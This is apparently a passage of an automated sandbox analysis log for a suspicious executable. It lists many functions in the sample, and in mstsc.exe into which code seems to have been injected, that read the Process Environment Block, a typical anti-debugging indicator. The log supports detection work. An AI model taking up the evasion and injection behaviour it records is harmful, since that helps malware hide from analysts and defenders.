Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0111AE73 mov eax, dword ptr fs:[00000030h]	9_2_0111AE73
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0111AE73 mov eax, dword ptr fs:[00000030h]	9_2_0111AE73
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0111AE73 mov eax, dword ptr fs:[00000030h]	9_2_0111AE73
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0111AE73 mov eax, dword ptr fs:[00000030h]	9_2_0111AE73
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0110766D mov eax, dword ptr fs:[00000030h]	9_2_0110766D
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0118FE87 mov eax, dword ptr fs:[00000030h]	9_2_0118FE87
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011746A7 mov eax, dword ptr fs:[00000030h]	9_2_011746A7
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C0EA5 mov eax, dword ptr fs:[00000030h]	9_2_011C0EA5
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C0EA5 mov eax, dword ptr fs:[00000030h]	9_2_011C0EA5
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C0EA5 mov eax, dword ptr fs:[00000030h]	9_2_011C0EA5
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C8ED6 mov eax, dword ptr fs:[00000030h]	9_2_011C8ED6
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01138EC7 mov eax, dword ptr fs:[00000030h]	9_2_01138EC7
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011AFEC0 mov eax, dword ptr fs:[00000030h]	9_2_011AFEC0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011236CC mov eax, dword ptr fs:[00000030h]	9_2_011236CC
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011216E0 mov ecx, dword ptr fs:[00000030h]	9_2_011216E0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011076E2 mov eax, dword ptr fs:[00000030h]	9_2_011076E2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F858EC mov eax, dword ptr fs:[00000030h]	23_2_04F858EC
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05058D34 mov eax, dword ptr fs:[00000030h]	23_2_05058D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_0500A537 mov eax, dword ptr fs:[00000030h]	23_2_0500A537
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05003540 mov eax, dword ptr fs:[00000030h]	23_2_05003540
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FBF0BF mov ecx, dword ptr fs:[00000030h]	23_2_04FBF0BF
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FBF0BF mov eax, dword ptr fs:[00000030h]	23_2_04FBF0BF
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FBF0BF mov eax, dword ptr fs:[00000030h]	23_2_04FBF0BF
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC90AF mov eax, dword ptr fs:[00000030h]	23_2_04FC90AF
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB20A0 mov eax, dword ptr fs:[00000030h]	23_2_04FB20A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB20A0 mov eax, dword ptr fs:[00000030h]	23_2_04FB20A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB20A0 mov eax, dword ptr fs:[00000030h]	23_2_04FB20A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB20A0 mov eax, dword ptr fs:[00000030h]	23_2_04FB20A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB20A0 mov eax, dword ptr fs:[00000030h]	23_2_04FB20A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB20A0 mov eax, dword ptr fs:[00000030h]	23_2_04FB20A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F9849B mov eax, dword ptr fs:[00000030h]	23_2_04F9849B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F89080 mov eax, dword ptr fs:[00000030h]	23_2_04F89080
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FA746D mov eax, dword ptr fs:[00000030h]	23_2_04FA746D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_050069A6 mov eax, dword ptr fs:[00000030h]	23_2_050069A6
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_050505AC mov eax, dword ptr fs:[00000030h]	23_2_050505AC
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_050505AC mov eax, dword ptr fs:[00000030h]	23_2_050505AC
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FA0050 mov eax, dword ptr fs:[00000030h]	23_2_04FA0050
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FA0050 mov eax, dword ptr fs:[00000030h]	23_2_04FA0050
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FBA44B mov eax, dword ptr fs:[00000030h]	23_2_04FBA44B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_050051BE mov eax, dword ptr fs:[00000030h]	23_2_050051BE
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_050051BE mov eax, dword ptr fs:[00000030h]	23_2_050051BE
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_050051BE mov eax, dword ptr fs:[00000030h]	23_2_050051BE
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_050051BE mov eax, dword ptr fs:[00000030h]	23_2_050051BE
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05006DC9 mov eax, dword ptr fs:[00000030h]	23_2_05006DC9
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05006DC9 mov eax, dword ptr fs:[00000030h]	23_2_05006DC9
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05006DC9 mov eax, dword ptr fs:[00000030h]	23_2_05006DC9
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05006DC9 mov ecx, dword ptr fs:[00000030h]	23_2_05006DC9
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05006DC9 mov eax, dword ptr fs:[00000030h]	23_2_05006DC9
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05006DC9 mov eax, dword ptr fs:[00000030h]	23_2_05006DC9
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F9B02A mov eax, dword ptr fs:[00000030h]	23_2_04F9B02A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F9B02A mov eax, dword ptr fs:[00000030h]	23_2_04F9B02A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F9B02A mov eax, dword ptr fs:[00000030h]	23_2_04F9B02A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F9B02A mov eax, dword ptr fs:[00000030h]	23_2_04F9B02A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB002D mov eax, dword ptr fs:[00000030h]	23_2_04FB002D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB002D mov eax, dword ptr fs:[00000030h]	23_2_04FB002D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB002D mov eax, dword ptr fs:[00000030h]	23_2_04FB002D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB002D mov eax, dword ptr fs:[00000030h]	23_2_04FB002D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB002D mov eax, dword ptr fs:[00000030h]	23_2_04FB002D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FBBC2C mov eax, dword ptr fs:[00000030h]	23_2_04FBBC2C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_050141E8 mov eax, dword ptr fs:[00000030h]	23_2_050141E8
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05038DF1 mov eax, dword ptr fs:[00000030h]	23_2_05038DF1
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]	23_2_05041C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]	23_2_05041C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]	23_2_05041C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]	23_2_05041C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]	23_2_05041C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]	23_2_05041C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]	23_2_05041C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]	23_2_05041C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]	23_2_05041C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]	23_2_05041C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]	23_2_05041C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]	23_2_05041C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]	23_2_05041C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]	23_2_05041C06
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_0505740D mov eax, dword ptr fs:[00000030h]	23_2_0505740D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_0505740D mov eax, dword ptr fs:[00000030h]	23_2_0505740D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_0505740D mov eax, dword ptr fs:[00000030h]	23_2_0505740D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05006C0A mov eax, dword ptr fs:[00000030h]	23_2_05006C0A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05006C0A mov eax, dword ptr fs:[00000030h]	23_2_05006C0A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05006C0A mov eax, dword ptr fs:[00000030h]	23_2_05006C0A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05006C0A mov eax, dword ptr fs:[00000030h]	23_2_05006C0A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05054015 mov eax, dword ptr fs:[00000030h]	23_2_05054015
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05054015 mov eax, dword ptr fs:[00000030h]	23_2_05054015
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05007016 mov eax, dword ptr fs:[00000030h]	23_2_05007016
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05007016 mov eax, dword ptr fs:[00000030h]	23_2_05007016
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05007016 mov eax, dword ptr fs:[00000030h]	23_2_05007016
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F8B1E1 mov eax, dword ptr fs:[00000030h]	23_2_04F8B1E1
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F8B1E1 mov eax, dword ptr fs:[00000030h]	23_2_04F8B1E1
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F8B1E1 mov eax, dword ptr fs:[00000030h]	23_2_04F8B1E1
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F9D5E0 mov eax, dword ptr fs:[00000030h]	23_2_04F9D5E0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F9D5E0 mov eax, dword ptr fs:[00000030h]	23_2_04F9D5E0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB1DB5 mov eax, dword ptr fs:[00000030h]	23_2_04FB1DB5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB1DB5 mov eax, dword ptr fs:[00000030h]	23_2_04FB1DB5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB1DB5 mov eax, dword ptr fs:[00000030h]	23_2_04FB1DB5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_0501C450 mov eax, dword ptr fs:[00000030h]	23_2_0501C450
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_0501C450 mov eax, dword ptr fs:[00000030h]	23_2_0501C450
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB35A1 mov eax, dword ptr fs:[00000030h]	23_2_04FB35A1
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB61A0 mov eax, dword ptr fs:[00000030h]	23_2_04FB61A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB61A0 mov eax, dword ptr fs:[00000030h]	23_2_04FB61A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FBFD9B mov eax, dword ptr fs:[00000030h]	23_2_04FBFD9B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FBFD9B mov eax, dword ptr fs:[00000030h]	23_2_04FBFD9B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB2990 mov eax, dword ptr fs:[00000030h]	23_2_04FB2990
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05051074 mov eax, dword ptr fs:[00000030h]	23_2_05051074
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F82D8A mov eax, dword ptr fs:[00000030h]	23_2_04F82D8A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F82D8A mov eax, dword ptr fs:[00000030h]	23_2_04F82D8A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F82D8A mov eax, dword ptr fs:[00000030h]	23_2_04F82D8A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F82D8A mov eax, dword ptr fs:[00000030h]	23_2_04F82D8A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F82D8A mov eax, dword ptr fs:[00000030h]	23_2_04F82D8A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05042073 mov eax, dword ptr fs:[00000030h]	23_2_05042073
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FAC182 mov eax, dword ptr fs:[00000030h]	23_2_04FAC182
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB2581 mov eax, dword ptr fs:[00000030h]	23_2_04FB2581
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB2581 mov eax, dword ptr fs:[00000030h]	23_2_04FB2581
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB2581 mov eax, dword ptr fs:[00000030h]	23_2_04FB2581
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB2581 mov eax, dword ptr fs:[00000030h]	23_2_04FB2581
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FBA185 mov eax, dword ptr fs:[00000030h]	23_2_04FBA185
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05003884 mov eax, dword ptr fs:[00000030h]	23_2_05003884
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05003884 mov eax, dword ptr fs:[00000030h]	23_2_05003884
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F8B171 mov eax, dword ptr fs:[00000030h]	23_2_04F8B171
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F8B171 mov eax, dword ptr fs:[00000030h]	23_2_04F8B171
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FAC577 mov eax, dword ptr fs:[00000030h]	23_2_04FAC577
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FAC577 mov eax, dword ptr fs:[00000030h]	23_2_04FAC577
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F8C962 mov eax, dword ptr fs:[00000030h]	23_2_04F8C962
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FA7D50 mov eax, dword ptr fs:[00000030h]	23_2_04FA7D50
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FAB944 mov eax, dword ptr fs:[00000030h]	23_2_04FAB944
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FAB944 mov eax, dword ptr fs:[00000030h]	23_2_04FAB944
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC3D43 mov eax, dword ptr fs:[00000030h]	23_2_04FC3D43
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB4D3B mov eax, dword ptr fs:[00000030h]	23_2_04FB4D3B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB4D3B mov eax, dword ptr fs:[00000030h]	23_2_04FB4D3B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB4D3B mov eax, dword ptr fs:[00000030h]	23_2_04FB4D3B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB513A mov eax, dword ptr fs:[00000030h]	23_2_04FB513A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB513A mov eax, dword ptr fs:[00000030h]	23_2_04FB513A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F8AD30 mov eax, dword ptr fs:[00000030h]	23_2_04F8AD30
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]	23_2_04F93D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]	23_2_04F93D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]	23_2_04F93D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]	23_2_04F93D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]	23_2_04F93D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]	23_2_04F93D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]	23_2_04F93D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]	23_2_04F93D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]	23_2_04F93D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]	23_2_04F93D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]	23_2_04F93D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]	23_2_04F93D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]	23_2_04F93D34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_0501B8D0 mov eax, dword ptr fs:[00000030h]	23_2_0501B8D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_0501B8D0 mov ecx, dword ptr fs:[00000030h]	23_2_0501B8D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_0501B8D0 mov eax, dword ptr fs:[00000030h]	23_2_0501B8D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_0501B8D0 mov eax, dword ptr fs:[00000030h]	23_2_0501B8D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_0501B8D0 mov eax, dword ptr fs:[00000030h]	23_2_0501B8D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_0501B8D0 mov eax, dword ptr fs:[00000030h]	23_2_0501B8D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05058CD6 mov eax, dword ptr fs:[00000030h]	23_2_05058CD6
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FA4120 mov eax, dword ptr fs:[00000030h]	23_2_04FA4120
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FA4120 mov eax, dword ptr fs:[00000030h]	23_2_04FA4120
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FA4120 mov eax, dword ptr fs:[00000030h]	23_2_04FA4120
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FA4120 mov eax, dword ptr fs:[00000030h]	23_2_04FA4120
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FA4120 mov ecx, dword ptr fs:[00000030h]	23_2_04FA4120
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05006CF0 mov eax, dword ptr fs:[00000030h]	23_2_05006CF0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05006CF0 mov eax, dword ptr fs:[00000030h]	23_2_05006CF0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05006CF0 mov eax, dword ptr fs:[00000030h]	23_2_05006CF0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F89100 mov eax, dword ptr fs:[00000030h]	23_2_04F89100
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F89100 mov eax, dword ptr fs:[00000030h]	23_2_04F89100
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F89100 mov eax, dword ptr fs:[00000030h]	23_2_04F89100
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_050414FB mov eax, dword ptr fs:[00000030h]	23_2_050414FB
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_0505070D mov eax, dword ptr fs:[00000030h]	23_2_0505070D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_0505070D mov eax, dword ptr fs:[00000030h]	23_2_0505070D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_0501FF10 mov eax, dword ptr fs:[00000030h]	23_2_0501FF10
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_0501FF10 mov eax, dword ptr fs:[00000030h]	23_2_0501FF10
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB16E0 mov ecx, dword ptr fs:[00000030h]	23_2_04FB16E0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F976E2 mov eax, dword ptr fs:[00000030h]	23_2_04F976E2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_0504131B mov eax, dword ptr fs:[00000030h]	23_2_0504131B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB2AE4 mov eax, dword ptr fs:[00000030h]	23_2_04FB2AE4
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB2ACB mov eax, dword ptr fs:[00000030h]	23_2_04FB2ACB
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB36CC mov eax, dword ptr fs:[00000030h]	23_2_04FB36CC
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC8EC7 mov eax, dword ptr fs:[00000030h]	23_2_04FC8EC7
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F9AAB0 mov eax, dword ptr fs:[00000030h]	23_2_04F9AAB0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F9AAB0 mov eax, dword ptr fs:[00000030h]	23_2_04F9AAB0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FBFAB0 mov eax, dword ptr fs:[00000030h]	23_2_04FBFAB0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F852A5 mov eax, dword ptr fs:[00000030h]	23_2_04F852A5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F852A5 mov eax, dword ptr fs:[00000030h]	23_2_04F852A5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F852A5 mov eax, dword ptr fs:[00000030h]	23_2_04F852A5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F852A5 mov eax, dword ptr fs:[00000030h]	23_2_04F852A5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F852A5 mov eax, dword ptr fs:[00000030h]	23_2_04F852A5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05058B58 mov eax, dword ptr fs:[00000030h]	23_2_05058B58
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05058F6A mov eax, dword ptr fs:[00000030h]	23_2_05058F6A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FBD294 mov eax, dword ptr fs:[00000030h]	23_2_04FBD294
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FBD294 mov eax, dword ptr fs:[00000030h]	23_2_04FBD294
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_0503D380 mov ecx, dword ptr fs:[00000030h]	23_2_0503D380
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC927A mov eax, dword ptr fs:[00000030h]	23_2_04FC927A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FAAE73 mov eax, dword ptr fs:[00000030h]	23_2_04FAAE73
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FAAE73 mov eax, dword ptr fs:[00000030h]	23_2_04FAAE73
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FAAE73 mov eax, dword ptr fs:[00000030h]	23_2_04FAAE73
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FAAE73 mov eax, dword ptr fs:[00000030h]	23_2_04FAAE73
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FAAE73 mov eax, dword ptr fs:[00000030h]	23_2_04FAAE73
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_0504138A mov eax, dword ptr fs:[00000030h]	23_2_0504138A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F9766D mov eax, dword ptr fs:[00000030h]	23_2_04F9766D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05007794 mov eax, dword ptr fs:[00000030h]	23_2_05007794
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05007794 mov eax, dword ptr fs:[00000030h]	23_2_05007794
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05007794 mov eax, dword ptr fs:[00000030h]	23_2_05007794
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05055BA5 mov eax, dword ptr fs:[00000030h]	23_2_05055BA5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F89240 mov eax, dword ptr fs:[00000030h]	23_2_04F89240
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F89240 mov eax, dword ptr fs:[00000030h]	23_2_04F89240
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F89240 mov eax, dword ptr fs:[00000030h]	23_2_04F89240
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F89240 mov eax, dword ptr fs:[00000030h]	23_2_04F89240
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F97E41 mov eax, dword ptr fs:[00000030h]	23_2_04F97E41
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F97E41 mov eax, dword ptr fs:[00000030h]	23_2_04F97E41
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F97E41 mov eax, dword ptr fs:[00000030h]	23_2_04F97E41
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F97E41 mov eax, dword ptr fs:[00000030h]	23_2_04F97E41
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F97E41 mov eax, dword ptr fs:[00000030h]	23_2_04F97E41
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F97E41 mov eax, dword ptr fs:[00000030h]	23_2_04F97E41
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_050053CA mov eax, dword ptr fs:[00000030h]	23_2_050053CA
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_050053CA mov eax, dword ptr fs:[00000030h]	23_2_050053CA
